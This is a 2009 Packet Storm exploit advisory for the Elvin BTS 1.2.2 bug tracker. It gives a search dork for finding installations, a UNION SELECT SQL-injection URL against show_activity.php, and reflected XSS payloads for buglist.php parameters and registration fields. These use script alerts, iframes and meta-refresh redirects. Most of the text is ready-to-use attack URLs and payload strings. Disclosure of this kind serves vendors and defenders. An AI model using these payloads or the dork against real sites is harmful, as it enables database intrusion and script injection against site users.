Elvin BTS 1.2.2 SQL Injection / XSS

2009-07-08T00:00:00
ID PACKETSTORM:79002
Type packetstorm
Reporter 599eme Man
Modified 2009-07-08T00:00:00

Description

                                        
                                            `  
)-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=(  
( [-] Elvin BTS 1.2.2 Multiple Remote VUlnerabilities )  
) [-] Official SITE : http://www.elvinbts.org/ (  
( [-] Dork : Powered by Elvin Bug Tracking Server. )  
)--------------------------------------------------------------(  
( [-] Discovered By 599eme Man )  
) [-] Flouf@live.fr (  
( [-] BIG THANKS TO : Moudi ;) )  
)--------------------------------------------------------------(  
(-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=)  
  
  
[+] -- Bug SQL --  
  
http://landfill.elvinbts.org/show_activity.php?id=sql  
  
  
Demo:  
  
http://landfill.elvinbts.org/show_activity.php?id=null+union+select+1,2,3,4,5,version(),7,8--  
  
  
  
[+] -- Bug XSS ( iframe - redirect ) --  
  
http://landfill.elvinbts.org/buglist.php?component=xss  
  
http://landfill.elvinbts.org/buglist.php?priority=xss  
  
  
Demo:  
  
  
http://landfill.elvinbts.org/buglist.php?component=%22%27%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E  
  
http://landfill.elvinbts.org/buglist.php?priority=%22%27%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E  
  
http://landfill.elvinbts.org/buglist.php?component=%22%27%3E%3Ciframe%20src=%22http://google.com%22%3E%3C/iframe%3E  
  
http://landfill.elvinbts.org/buglist.php?priority=%22%27%3E%3Ciframe%20src=%22http://google.com%22%3E%3C/iframe%3E  
  
http://landfill.elvinbts.org/buglist.php?component=<meta http-equiv="Refresh" content="0; url=http://www.google.com">  
  
http://landfill.elvinbts.org/buglist.php?priority=<meta http-equiv="Refresh" content="0; url=http://www.google.com">  
  
  
username : "'><script>alert('xss')</script>  
email : "'><script>alert('xss')</script>  
pass : "'><script>alert('xss')</script>  
confirm pass : "'><script>alert('xss')</script>  
  
  
[-] Discovered By 599eme Man   
[-] Flouf@live.fr  
[-] BIG THANKS TO : Moudi.   
  
  
_________________________________________________________________  
Téléphonez gratuitement à tous vos proches avec Windows Live Messenger ! Téléchargez-le maintenant !   
http://www.windowslive.fr/messenger/1.asp`